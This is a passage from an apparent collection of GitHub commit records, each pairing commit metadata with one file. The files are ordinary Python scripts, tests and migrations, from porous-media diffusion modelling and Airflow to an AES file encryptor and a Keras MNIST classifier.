Deff0 = Mdot * L / A
# Get Deff w/ including Knudsen effect
mdiff = op.models.physics.diffusive_conductance.mixed_diffusivity
phys.add_model(propname="throat.diffusive_conductance", model=mdiff)
spacings = np.linspace(1e-9, 1e-4, 20)
spacings = np.logspace(-9, -3, 25)
Deff = []
for spacing in spacings:
np.random.seed(10)
net = op.network.Cubic(shape=[10, 10, 10], spacing=spacing)
geom = op.geometry.StickAndBall(network=net)
air = op.phases.Air(network=net)
phys = op.physics.Standard(network=net, geometry=geom, phase=air)
phys.add_model(propname="throat.diffusive_conductance", model=mdiff)
fd = op.algorithms.FickianDiffusion(network=net, phase=air)
fd.set_value_BC(pores=net.pores("left"), values=1.0)
fd.set_value_BC(pores=net.pores("right"), values=0.0)
fd.run()
L = (net.shape * net.spacing)[1]
A = (net.shape * net.spacing)[[0, 2]].prod()
Mdot = fd.rate(pores=net.pores("left")).squeeze()
Deff.append(Mdot * L / A)
# Plot ratio of Deff w/ Knudsen to that w/o
Deff = np.array(Deff)
plt.figure()
plt.plot(spacings, Deff/Deff0)
plt.xscale("log")
plt.xlabel("spacing (m)")
plt.ylabel("Deff/Deff0")
| mit | Python |
|
a6bbcc46765fee52eba9c31b95d456977fbeeefe | add beautify for print beautify words | seamile/WeedLab,seamile/Weeds,seamile/Weeds,seamile/WeedLab | Scripts/beautify.py | Scripts/beautify.py | #!/usr/bin/env python
import sys
def beautify(line, bold=False):
k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
v = '𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏'
bv = '𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩𝓪𝓫𝓬𝓭𝓮𝓯𝓰𝓱𝓲𝓳𝓴𝓵𝓶𝓷𝓸𝓹𝓺𝓻𝓼𝓽𝓾𝓿𝔀𝔁𝔂𝔃'
chars = dict(zip(k, bv if bold else v))
return ''.join([chars.get(char, char) for char in line])
if __name__ == '__main__':
user_input = ' '.join(sys.argv[1:])
result = beautify(user_input)
print(result)
| mit | Python |
|
ef9b099b1a0f6abe4bde3d74f79d0daa31c38dbd | Add interactive flash size (energy) spectrum plot that can sync to points in 4-panel view | nguy/brawl4d,deeplycloudy/brawl4d | LMA/analysis.py | LMA/analysis.py | """
Get a plot of the flash energy spectrum for flashes in the current brawl4d view.
lma_ctrl is an instance of brawl4d.LMA.controller.LMAController that
>>> from brawl4d.brawl4d import B4D_startup
>>> from datetime import datetime
>>> panels = B4D_startup(basedate=datetime(2012,5,29), ctr_lat=35.2791257, ctr_lon=-97.9178678)
>>> from brawl4d.LMA.controller import LMAController
>>> lma_file = '/data/20120529/flash_sort_prelim/h5_files/2012/May/29/LYLOUT_120529_233000_0600.dat.flash.h5'
>>> lma_ctrl = LMAController()
>>> d, post_filter_brancher, scatter_ctrl, charge_lasso = lma_ctrl.load_hdf5_to_panels(panels, lma_file)
>>> current_events_flashes = lma_ctrl.flash_stats_for_dataset(d, scatter_ctrl.branchpoint)
>>> energy_spectrum_plotter = FlashEnergySpectrumController(bounds_provider=panels)
>>> current_events_flashes.targets.add(energy_spectrum_plotter.inlet)
"""
import numpy as np
from stormdrain.pipeline import coroutine
from stormdrain.support.matplotlib.artistupdaters import LineArtistUpdater
from lmatools.flash_stats import events_flashes_receiver, histogram_for_parameter, energy_plot_setup, calculate_energy_from_area_histogram
class FlashEnergySpectrumController(object):
def __init__(self, coord_names=('length_scale', 'energy'), bin_unit='km', bounds_provider=None):
""" The inlet attribute of this object is a running coroutine ready to receive (events,flashes).
bounds_provider should have a bounds attribute that provides a time coordinate 'time' in seconds
"""
min_pwr = -2
max_pwr = 4
delta_pwr = 0.1
powers = np.arange(min_pwr, max_pwr+delta_pwr, delta_pwr)
footprint_bin_edges = 10**powers
self.coord_names=coord_names
self.bounds_provider = bounds_provider
fig, spectrum_ax, fivethirds_line_artist, spectrum_artist = energy_plot_setup()
self.spectrum_ax=spectrum_ax
self.spectrum_plot_outlet = LineArtistUpdater(spectrum_artist, coord_names=self.coord_names).update()
self.histogrammer = histogram_for_parameter('area', footprint_bin_edges, target=self.calculate_energy(target=self.spectrum_plot_outlet))
self.inlet = events_flashes_receiver(target=self.histogrammer)
@coroutine
def calculate_energy(self, target=None, length_scale_factor=1000.0, t_coord='time'):
""" Presumes the histogram is of area, and that area is in km^2 (as indicated by length_scale_factor) """
xname, yname = self.coord_names
dtype = [(xname,'f4'), (yname,'f4')]
while True:
t_range = self.bounds_provider.bounds[t_coord]
duration = t_range[1] - t_range[0]
histo, bin_edges = (yield)
flash_1d_extent, specific_energy = calculate_energy_from_area_histogram(histo, bin_edges, duration)
if target is not None:
# package energy spectrum as a named array
a = np.empty_like(flash_1d_extent, dtype=dtype)
a[xname]=flash_1d_extent
a[yname]=specific_energy
target.send(a)
self.spectrum_ax.figure.canvas.draw()
#ax.loglog(flash_1d_extent, specific_energy, 'r')
| bsd-2-clause | Python |
|
e1772c008d607a2545ddaa05508b1a74473be0ec | Add TaskInstance index on job_id | asnir/airflow,janczak10/incubator-airflow,KL-WLCR/incubator-airflow,airbnb/airflow,Acehaidrey/incubator-airflow,jhsenjaliya/incubator-airflow,airbnb/airflow,adamhaney/airflow,mrares/incubator-airflow,Fokko/incubator-airflow,skudriashev/incubator-airflow,mistercrunch/airflow,mtagle/airflow,OpringaoDoTurno/airflow,dhuang/incubator-airflow,Twistbioscience/incubator-airflow,MortalViews/incubator-airflow,cjqian/incubator-airflow,artwr/airflow,Twistbioscience/incubator-airflow,wndhydrnt/airflow,bolkedebruin/airflow,yk5/incubator-airflow,bolkedebruin/airflow,lyft/incubator-airflow,jgao54/airflow,gilt/incubator-airflow,hgrif/incubator-airflow,nathanielvarona/airflow,wooga/airflow,sekikn/incubator-airflow,MortalViews/incubator-airflow,fenglu-g/incubator-airflow,ProstoMaxim/incubator-airflow,yk5/incubator-airflow,gtoonstra/airflow,ProstoMaxim/incubator-airflow,mrkm4ntr/incubator-airflow,skudriashev/incubator-airflow,artwr/airflow,akosel/incubator-airflow,gtoonstra/airflow,criccomini/airflow,spektom/incubator-airflow,yati-sagade/incubator-airflow,zack3241/incubator-airflow,apache/incubator-airflow,janczak10/incubator-airflow,CloverHealth/airflow,dmitry-r/incubator-airflow,Acehaidrey/incubator-airflow,lxneng/incubator-airflow,CloverHealth/airflow,wooga/airflow,owlabs/incubator-airflow,wolfier/incubator-airflow,wooga/airflow,MortalViews/incubator-airflow,adamhaney/airflow,adamhaney/airflow,malmiron/incubator-airflow,yati-sagade/incubator-airflow,CloverHealth/airflow,sid88in/incubator-airflow,janczak10/incubator-airflow,edgarRd/incubator-airflow,MetrodataTeam/incubator-airflow,andyxhadji/incubator-airflow,DinoCow/airflow,OpringaoDoTurno/airflow,yati-sagade/incubator-airflow,yk5/incubator-airflow,cfei18/incubator-airflow,cfei18/incubator-airflow,fenglu-g/incubator-airflow,apache/airflow,mrares/incubator-airflow,mrkm4ntr/incubator-airflow,danielvdende/incubator-airflow,akosel/incubator-airflow,apache/airflow,dhuang/incubator-airflow,yati-sagade/incubator-airflow,wndhydrnt/airflow,sergiohgz/incubator-airflow,andyxhadji/incubator-airflow,gilt/incubator-airflow,dhuang/incubator-airflow,bolkedebruin/airflow,jgao54/airflow,KL-WLCR/incubator-airflow,asnir/airflow,gilt/incubator-airflow,edgarRd/incubator-airflow,asnir/airflow,wolfier/incubator-airflow,wolfier/incubator-airflow,apache/airflow,cjqian/incubator-airflow,edgarRd/incubator-airflow,zack3241/incubator-airflow,cfei18/incubator-airflow,mtagle/airflow,ProstoMaxim/incubator-airflow,dhuang/incubator-airflow,cjqian/incubator-airflow,Tagar/incubator-airflow,mrkm4ntr/incubator-airflow,malmiron/incubator-airflow,Twistbioscience/incubator-airflow,lxneng/incubator-airflow,apache/incubator-airflow,Twistbioscience/incubator-airflow,danielvdende/incubator-airflow,danielvdende/incubator-airflow,r39132/airflow,janczak10/incubator-airflow,subodhchhabra/airflow,jfantom/incubator-airflow,criccomini/airflow,fenglu-g/incubator-airflow,airbnb/airflow,yk5/incubator-airflow,mistercrunch/airflow,apache/incubator-airflow,owlabs/incubator-airflow,RealImpactAnalytics/airflow,DinoCow/airflow,nathanielvarona/airflow,Acehaidrey/incubator-airflow,KL-WLCR/incubator-airflow,apache/airflow,nathanielvarona/airflow,MetrodataTeam/incubator-airflow,MetrodataTeam/incubator-airflow,sergiohgz/incubator-airflow,malmiron/incubator-airflow,zack3241/incubator-airflow,Tagar/incubator-airflow,skudriashev/incubator-airflow,spektom/incubator-airflow,wileeam/airflow,skudriashev/incubator-airflow,spektom/incubator-airflow,RealImpactAnalytics/airflow,jgao54/airflow,lyft/incubator-airflow,mtagle/airflow,sekikn/incubator-airflow,wileeam/airflow,Fokko/incubator-airflow,gtoonstra/airflow,artwr/airflow,akosel/incubator-airflow,artwr/airflow,OpringaoDoTurno/airflow,r39132/airflow,andyxhadji/incubator-airflow,RealImpactAnalytics/airflow,Tagar/incubator-airflow,wndhydrnt/airflow,KL-WLCR/incubator-airflow,jfantom/incubator-airflow,jfantom/incubator-airflow,gtoonstra/airflow,jhsenjaliya/incubator-airflow,sergiohgz/incubator-airflow,mrares/incubator-airflow,hgrif/incubator-airflow,jhsenjaliya/incubator-airflow,danielvdende/incubator-airflow,Tagar/incubator-airflow,sekikn/incubator-airflow,danielvdende/incubator-airflow,lxneng/incubator-airflow,sergiohgz/incubator-airflow,mrkm4ntr/incubator-airflow,adamhaney/airflow,dmitry-r/incubator-airflow,edgarRd/incubator-airflow,danielvdende/incubator-airflow,cfei18/incubator-airflow,r39132/airflow,CloverHealth/airflow,sekikn/incubator-airflow,airbnb/airflow,sid88in/incubator-airflow,lyft/incubator-airflow,criccomini/airflow,Acehaidrey/incubator-airflow,sid88in/incubator-airflow,bolkedebruin/airflow,subodhchhabra/airflow,MortalViews/incubator-airflow,akosel/incubator-airflow,ProstoMaxim/incubator-airflow,jfantom/incubator-airflow,zack3241/incubator-airflow,lxneng/incubator-airflow,fenglu-g/incubator-airflow,Acehaidrey/incubator-airflow,jgao54/airflow,MetrodataTeam/incubator-airflow,r39132/airflow,hgrif/incubator-airflow,wolfier/incubator-airflow,cfei18/incubator-airflow,cfei18/incubator-airflow,nathanielvarona/airflow,hgrif/incubator-airflow,malmiron/incubator-airflow,subodhchhabra/airflow,wndhydrnt/airflow,dmitry-r/incubator-airflow,spektom/incubator-airflow,cjqian/incubator-airflow,mrares/incubator-airflow,DinoCow/airflow,wileeam/airflow,mistercrunch/airflow,RealImpactAnalytics/airflow,subodhchhabra/airflow,bolkedebruin/airflow,Fokko/incubator-airflow,asnir/airflow,Fokko/incubator-airflow,mtagle/airflow,wileeam/airflow,owlabs/incubator-airflow,jhsenjaliya/incubator-airflow,nathanielvarona/airflow,apache/airflow,criccomini/airflow,OpringaoDoTurno/airflow,DinoCow/airflow,apache/airflow,dmitry-r/incubator-airflow,sid88in/incubator-airflow,nathanielvarona/airflow,andyxhadji/incubator-airflow,gilt/incubator-airflow,wooga/airflow,Acehaidrey/incubator-airflow,lyft/incubator-airflow,owlabs/incubator-airflow,apache/incubator-airflow,mistercrunch/airflow | airflow/migrations/versions/7171349d4c73_add_ti_job_id_index.py | airflow/migrations/versions/7171349d4c73_add_ti_job_id_index.py | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add ti job_id index
Revision ID: 7171349d4c73
Revises: cc1e65623dc7
Create Date: 2017-08-14 18:08:50.196042
"""
# revision identifiers, used by Alembic.
revision = '7171349d4c73'
down_revision = 'cc1e65623dc7'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_index('ti_job_id', 'task_instance', ['job_id'], unique=False)
def downgrade():
op.drop_index('ti_job_id', table_name='task_instance')
| apache-2.0 | Python |
|
74dee1d09fdc09f93af3d15286336d7face4ba08 | add test file for proper_parens. | constanthatz/data-structures | test_proper_parens.py | test_proper_parens.py | from __future__ import unicode_literals
from proper_parens import check_statement
def test_check_statement():
# Edge cases of strings of length one
value = ")"
assert check_statement(value) == -1
value = "("
assert check_statement(value) == 1
# Edge cases of strings of length two
value = "()"
assert check_statement(value) == 0
# 'Balanced' but broken
value = ")("
assert check_statement(value) == -1
# Broken beginnning, middle, and end
value = ")()"
assert check_statement(value) == -1
value = "())()"
assert check_statement(value) == -1
value = "())"
assert check_statement(value) == -1
# Open beginnning, middle, and end
value = "(()"
assert check_statement(value) == 1
value = "()(()"
assert check_statement(value) == 1
value = "()("
assert check_statement(value) == 1
| mit | Python |
|
77637c0eca6ba5cd00e8f1fbe863a1fd293c980f | Create __init__.py | aceofwings/Evt-Gateway,aceofwings/Evt-Gateway | tests/CAN/__init__.py | tests/CAN/__init__.py | mit | Python |
||
b936fe0b01a29f8638f662a4a779226fe93cd6fa | Create 5kyu_faulty_odometer.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/5kyu/5kyu_faulty_odometer.py | Solutions/5kyu/5kyu_faulty_odometer.py | BASE = '012356789'
def faulty_odometer(num):
result = 0
for i, n in enumerate(str(num)[::-1]):
result += BASE.index(n) * len(BASE) ** i
return result
| mit | Python |
|
ab753bc09d27cc00780d48769d8c12a9015fae18 | Create 0062_siteoption_copyright_notice.py | ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player,ScanOC/trunk-player | radio/migrations/0062_siteoption_copyright_notice.py | radio/migrations/0062_siteoption_copyright_notice.py | # -*- coding: utf-8 -*-
# Save default html text for index and about page
from __future__ import unicode_literals
from django.db import migrations, models
def set_default_html(apps, schema_editor):
SiteOption = apps.get_model('radio', 'SiteOption')
SiteOption(name='COPYRIGHT_NOTICE',
value = 'Copyright 2019',
javascript_visible = True,
template_visible = True,
description = 'Edit to update Copyright notice',
).save()
def nothing_to_do(apps, schema_editor):
SiteOption = apps.get_model('radio', 'SiteOption')
SiteOption.objects.get(name='COPYRIGHT_NOTICE').delete()
class Migration(migrations.Migration):
dependencies = [
('radio', '0061_transmission_has_audio'),
]
operations = [
migrations.RunPython(set_default_html, nothing_to_do),
]
| mit | Python |
|
fa7b12066fd81ed97bb0ecbd13690f850021915f | Create crossover.py | architecture-building-systems/CEAforArcGIS,architecture-building-systems/CEAforArcGIS | cea/optimization/master/crossover.py | cea/optimization/master/crossover.py | """
Crossover routines
"""
from __future__ import division
from deap import tools
from cea.optimization.master.validation import validation_main
def crossover_main(individual, indpb,
column_names,
heating_unit_names_share,
cooling_unit_names_share,
column_names_buildings_heating,
column_names_buildings_cooling,
district_heating_network,
district_cooling_network
):
# create dict of individual with his/her name
individual_with_name_dict = dict(zip(column_names, individual))
if district_heating_network:
# MUTATE BUILDINGS CONNECTED
buildings_heating = [individual_with_name_dict[column] for column in column_names_buildings_heating]
# apply mutations
buildings_heating_mutated = tools.cxUniform(buildings_heating, indpb)[0]
# take back to the individual
for column, cross_over_value in zip(column_names_buildings_heating, buildings_heating_mutated):
individual_with_name_dict[column] = cross_over_value
# MUTATE SUPPLY SYSTEM UNITS SHARE
heating_units_share = [individual_with_name_dict[column] for column in heating_unit_names_share]
# apply mutations
heating_units_share_mutated = tools.cxUniform(heating_units_share, indpb)[0]
# takeback to teh individual
for column, cross_over_value in zip(heating_unit_names_share, heating_units_share_mutated):
individual_with_name_dict[column] = cross_over_value
if district_cooling_network:
# MUTATE BUILDINGS CONNECTED
buildings_cooling = [individual_with_name_dict[column] for column in column_names_buildings_cooling]
# apply mutations
buildings_cooling_mutated = tools.cxUniform(buildings_cooling, indpb)[0]
# take back to teh individual
for column, cross_over_value in zip(column_names_buildings_cooling, buildings_cooling_mutated):
individual_with_name_dict[column] = cross_over_value
# MUTATE SUPPLY SYSTEM UNITS SHARE
cooling_units_share = [individual_with_name_dict[column] for column in cooling_unit_names_share]
# apply mutations
cooling_units_share_mutated = tools.cxUniform(cooling_units_share, indpb)[0]
# takeback to teh individual
for column, cross_over_value in zip(cooling_unit_names_share, cooling_units_share_mutated):
individual_with_name_dict[column] = cross_over_value
# now validate individual
individual_with_name_dict = validation_main(individual_with_name_dict,
column_names_buildings_heating,
column_names_buildings_cooling,
district_heating_network,
district_cooling_network
)
# now pass all the values mutated to the original individual
for i, column in enumerate(column_names):
individual[i] = individual_with_name_dict[column]
return individual, # add the, because deap needs this
| mit | Python |
|
c2509a25eaf3522a55d061f940931447bbf023f1 | test pyCharm | Herne/pythonplayground | lp3thw/ex41.py | lp3thw/ex41.py | import random
from urllib.request import urlopen
import sys
WORD_URL = "http://learncodethehardway.org/words.txt"
WORDS = []
PHRASES = {
"class %%%(%%%):":
"Make a class named %%% that is-a %%%.",
"class %%%(object):\n\tdef __init__(self, ***)":
"class %%% has-a __init__ that takes self and *** params.",
"class %%%(object):\n\tdef ***(self, @@@)":
"class %%% has-a function *** that takes self and @@@ params.",
"*** = %%%()":
"Set *** to an instance of class %%%.",
"***.***(@@@)":
"From *** get the *** function, call it with params self, @@@.",
"***.*** = '***'":
"From *** get the *** attribute and set it to '***'."
}
# do they want to drill phrases first
if len(sys.argv) == 2 and sys.argv[1] == "english":
PHRASES_FIRST = True
else:
PHRASES_FIRST = False
# load up the words from the website
for word in urlopen(WORD_URL).readlines():
WORDS.append(str(word.strip(), encoding="utf-8"))
def convert(snippet, phrase):
class_names = [w.capitalize() for w in
random.sample(WORDS, snippet.count("%%%"))]
other_names = random.sample(WORDS, snippet.count("***"))
results = []
param_names = []
for i in range(0, snippet.count("@@@")):
param_count = random.randint(1, 3)
param_names.append(', '.join(
random.sample(WORDS, param_count)))
for sentence in snippet, phrase:
result = sentence[:]
# fake class names
for word in class_names:
result = result.replace("%%%", word, 1)
# fake other names
for word in other_names:
result = result.replace("***", word, 1)
# fake parameter lists
for word in param_names:
result = result.replace("@@@", word, 1)
results.append(result)
return results
# keep going until they hit CTRL-D
try:
while True:
snippets = list(PHRASES.keys())
random.shuffle(snippets)
for snippet in snippets:
phrase = PHRASES[snippet]
question, answer = convert(snippet, phrase)
if PHRASES_FIRST:
question, answer = answer, question
print(question)
input("> ")
print(f"ANSWER: {answer}\n\n")
except EOFError:
print("\nBye")
| mit | Python |
|
24cfe61a9e1d8ed5a78b2338e652085fc5b3f4e1 | Add example delete | dudymas/python-openstacksdk,mtougeron/python-openstacksdk,mtougeron/python-openstacksdk,dudymas/python-openstacksdk,briancurtin/python-openstacksdk,dtroyer/python-openstacksdk,stackforge/python-openstacksdk,openstack/python-openstacksdk,openstack/python-openstacksdk,dtroyer/python-openstacksdk,briancurtin/python-openstacksdk,stackforge/python-openstacksdk | examples/delete.py | examples/delete.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from examples import common
from examples import session
def run_delete(opts):
sess = session.make_session(opts)
cls = common.find_resource_cls(opts)
data = common.get_data_option(opts)
obj = cls.new(**data)
obj.delete(sess)
print('Deleted: %s' % str(data))
return
if __name__ == "__main__":
opts = common.setup()
sys.exit(common.main(opts, run_delete))
| apache-2.0 | Python |
|
0cb6b839509d3f5ecf0e2196c53decbf6fdac65e | add renameDate.py | 0verchenko/Utils | renameDates.py | renameDates.py | #! Python3
# renameDate.py - rename file name that include date in US format (MM-DD-YYYY)
# to EU format (DD-MM-YYYY)
import shutil, os, re
#Regex for US dates
datePattern = re.compile(r"""^(.*?) # All text before date
((0|1)?\d)- # one or two month digits
((0|1|2|3)?\d)- # one or two day digits
((19|20)\d\d) # four year digits
(.*?)$ # all text after date
""", re.VERBOSE)
# Loop for files in working catalog
for amerFilename in os.listdir('.'):
mo = datePattern.search(amerFilename)
# Leave files with names than not include dates
if mo == None:
continue
# Taking different parts of filename
beforePart = mo.group(1)
monthPart = mo.group(2)
dayPart = mo.group(4)
yearPart = mo.group(6)
afterPart = mo.group(8)
# Forming names in EU format
euroFilename = beforePart + dayPart + '-' + monthPart + '-' + yearPart + afterPart
# Taking fool absolute paths to files
absWorkingDir = os.path.abspath('.')
amerFilename = os.path.join(absWorkingDir, amerFilename)
euroFilename = os.path.join(absWorkingDir, euroFilename)
# Renaming files
print('Changing name "%s" to "%s"...' % (amerFilename, euroFilename))
shutil.move(amerFilename, euroFilename) | apache-2.0 | Python |
|
b920103c5aef9fa38d91e2fe0eafaeb8fd18d27b | Create FileEncryptor.py | griffincalme/ExperimentalScripts | FileEncryptor.py | FileEncryptor.py | import os
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto import Random
def encrypt(key, filename):
chunksize = 64 * 1024
outputFile = "(encrypted)" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV = Random.new().read(16)
encryptor = AES.new(key, AES.MODE_CBC, IV)
with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - (len(chunk) % 16))
outfile.write(encryptor.encrypt(chunk))
def decrypt(key, filename):
chunksize = 64 * 1024
outputFile = filename[11:]
with open(filename, 'rb') as infile:
filesize = int(infile.read(16))
IV = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, IV)
with open(outputFile, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(filesize)
def getKey(password):
hasher = SHA256.new(password.encode('utf-8'))
return hasher.digest()
def Main():
choice = input("Would you like to (E)ncrypt or (D)ecrypt?: ")
if choice == 'E':
filename = input('File to encrypt: ')
password = input("Password: ")
encrypt(getKey(password), filename)
print("Done.")
elif choice == 'D':
filename = input("File to decrypt: ")
password = input("Password: ")
decrypt(getKey(password), filename)
print("Done")
else:
print("You didn't type E or D, closing....")
if __name__ == '__main__':
Main()
Status API Training Shop Blog About
| mit | Python |
|
06e0f140c517e467445a59be989ba3b9ddd76503 | add tests for stdlib xpath | github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql,github/codeql | python/ql/test/library-tests/frameworks/stdlib/XPathExecution.py | python/ql/test/library-tests/frameworks/stdlib/XPathExecution.py | match = "dc:title"
ns = {'dc': 'http://purl.org/dc/elements/1.1/'}
import xml.etree.ElementTree as ET
tree = ET.parse('country_data.xml')
root = tree.getroot()
root.find(match, namespaces=ns) # $ MISSING: getXPath=match
root.findall(match, namespaces=ns) # $ MISSING: getXPath=match
root.findtext(match, default=None, namespaces=ns) # $ MISSING: getXPath=match
from xml.etree.ElementTree import ElementTree
tree = ElementTree()
tree.parse("index.xhtml")
tree.find(match, namespaces=ns) # $ MISSING: getXPath=match
tree.findall(match, namespaces=ns) # $ MISSING: getXPath=match
tree.findtext(match, default=None, namespaces=ns) # $ MISSING: getXPath=match
| mit | Python |
|
70f7096d353ee3edccf6e52e21c6a74db158d906 | Configure settings for py.test | teury/django-multimedia,jbittel/django-multimedia | conftest.py | conftest.py | import os
from django.conf import settings
def pytest_configure():
if not settings.configured:
os.environ['DJANGO_SETTINGS_MODULE'] = 'multimedia.tests.settings'
| bsd-3-clause | Python |
|
4863696bbfb46a836b4febc3397e51dd20214414 | add repoquery-recursive.py for downloading rpm packages and their dependencies exceluding which comes from install media | Zor-X-L/offline-utils,Zor-X-L/offline-utils | repoquery-recursive.py | repoquery-recursive.py | #!/usr/bin/python3
import sys
import subprocess
repoquery = ['repoquery', '--plugins', '--resolve', '--qf',
'%{name}.%{arch} %{repoid} %{location}', '--plugins', '-R']
package_info = dict()
def check_dep(packages):
#print(packages)
if len(packages) == 0:
return
cmd = repoquery + packages
output = subprocess.check_output(cmd).decode("utf-8")
wait_for_checking = []
for line in output.split('\n'):
if len(line) == 0:
continue
(package_name, repoid, location) = line.split(' ')
if (repoid != 'InstallMedia' and
package_name not in package_info):
package_info[package_name] = (repoid, location)
wait_for_checking.append(package_name)
check_dep(wait_for_checking)
check_dep(sys.argv[1:])
for package in package_info:
print(package_info[package][1])
| mit | Python |
|
0e2504171dc5679b5cdd1cb219ad1cd1e9f29262 | add a test case for performance benchmarking. | axt/angr,tyb0807/angr,f-prettyland/angr,tyb0807/angr,axt/angr,schieb/angr,axt/angr,angr/angr,iamahuman/angr,f-prettyland/angr,tyb0807/angr,chubbymaggie/angr,angr/angr,iamahuman/angr,schieb/angr,chubbymaggie/angr,angr/angr,chubbymaggie/angr,iamahuman/angr,schieb/angr,f-prettyland/angr | tests/perf_unicorn.py | tests/perf_unicorn.py |
import sys
import os
import time
import angr
import simuvex.s_options as so
import nose.tools
test_location = str(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../'))
def perf_unicorn_0():
p = angr.Project(os.path.join(test_location, 'binaries', 'tests', 'x86_64', 'perf_unicorn_0'))
s_unicorn = p.factory.entry_state(add_options=so.unicorn | {so.STRICT_PAGE_ACCESS}, remove_options={so.LAZY_SOLVES}) # unicorn
pg_unicorn = p.factory.path_group(s_unicorn)
start = time.time()
pg_unicorn.run()
elapsed = time.time() - start
print "Elapsed %f sec" % elapsed
print pg_unicorn.one_deadended
def perf_unicorn_1():
p = angr.Project(os.path.join(test_location, 'binaries', 'tests', 'x86_64', 'perf_unicorn_1'))
s_unicorn = p.factory.entry_state(add_options=so.unicorn | {so.STRICT_PAGE_ACCESS}, remove_options={so.LAZY_SOLVES}) # unicorn
pg_unicorn = p.factory.path_group(s_unicorn)
start = time.time()
pg_unicorn.run()
elapsed = time.time() - start
print "Elapsed %f sec" % elapsed
print pg_unicorn.one_deadended
if __name__ == "__main__":
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
print 'perf_' + arg
globals()['perf_' + arg]()
else:
for fk, fv in globals().items():
if fk.startswith('perf_') and callable(fv):
print fk
res = fv()
| bsd-2-clause | Python |
|
a2059d9c93553843094345ca857508e8cd7325c4 | Create mnist-keras.py | dhruvparamhans/mnist_keras | mnist-keras.py | mnist-keras.py | # Author: Hussein Al-barazanchi
# reading and saving the data are based on the code
# from the following link
# http://www.kaggle.com/users/9028/danb/digit-recognizer/convolutional-nn-in-python
# import numpy and pandas for array manipulationa and csv files
import numpy as np
import pandas as pd
# import keras necessary classes
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils
# Creating the model which consists of 3 conv layers followed by
# 2 fully conntected layers
print('creating the model')
# Sequential wrapper model
model = Sequential()
# first convolutional layer
model.add(Convolution2D(32,1,2,2))
model.add(Activation('relu'))
# second convolutional layer
model.add(Convolution2D(48, 32, 2, 2))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2,2)))
# third convolutional layer
model.add(Convolution2D(32, 48, 2, 2))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2,2)))
# convert convolutional filters to flatt so they can be feed to
# fully connected layers
model.add(Flatten())
# first fully connected layer
model.add(Dense(32*6*6, 128, init='lecun_uniform'))
model.add(Activation('relu'))
model.add(Dropout(0.25))
# second fully connected layer
model.add(Dense(128, 128, init='lecun_uniform'))
model.add(Activation('relu'))
model.add(Dropout(0.25))
# last fully connected layer which output classes
model.add(Dense(128, 10, init='lecun_uniform'))
model.add(Activation('softmax'))
# setting sgd optimizer parameters
sgd = SGD(lr=0.05, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd)
print('read data')
# reading training data
training = pd.read_csv('/home/mnist/train.csv')
# split training labels and pre-process them
training_targets = training.ix[:,0].values.astype('int32')
training_targets = np_utils.to_categorical(training_targets)
# split training inputs
training_inputs = (training.ix[:,1:].values).astype('float32')
# read testing data
testing_inputs = (pd.read_csv('/home/mnist/test.csv').values).astype('float32')
# pre-process training and testing data
max_value = np.max(training_inputs)
training_inputs /= max_value
testing_inputs /= max_value
mean_value = np.std(training_inputs)
training_inputs -= mean_value
testing_inputs -= mean_value
# reshaping training and testing data so it can be feed to convolutional layers
training_inputs = training_inputs.reshape(training_inputs.shape[0], 1, 28, 28)
testing_inputs = testing_inputs.reshape(testing_inputs.shape[0], 1, 28, 28)
print("Starting training")
model.fit(training_inputs, training_targets, nb_epoch=10, batch_size=1000, validation_split=0.1, show_accuracy=True)
print("Generating predections")
preds = model.predict_classes(testing_inputs, verbose=0)
def write_preds(preds, fname):
pd.DataFrame({"ImageId": list(range(1,len(preds)+1)), "Label": preds}).to_csv(fname, index=False, header=True)
print('Saving predictions')
write_preds(preds, "keras-mlp.csv")
| mit | Python |
|
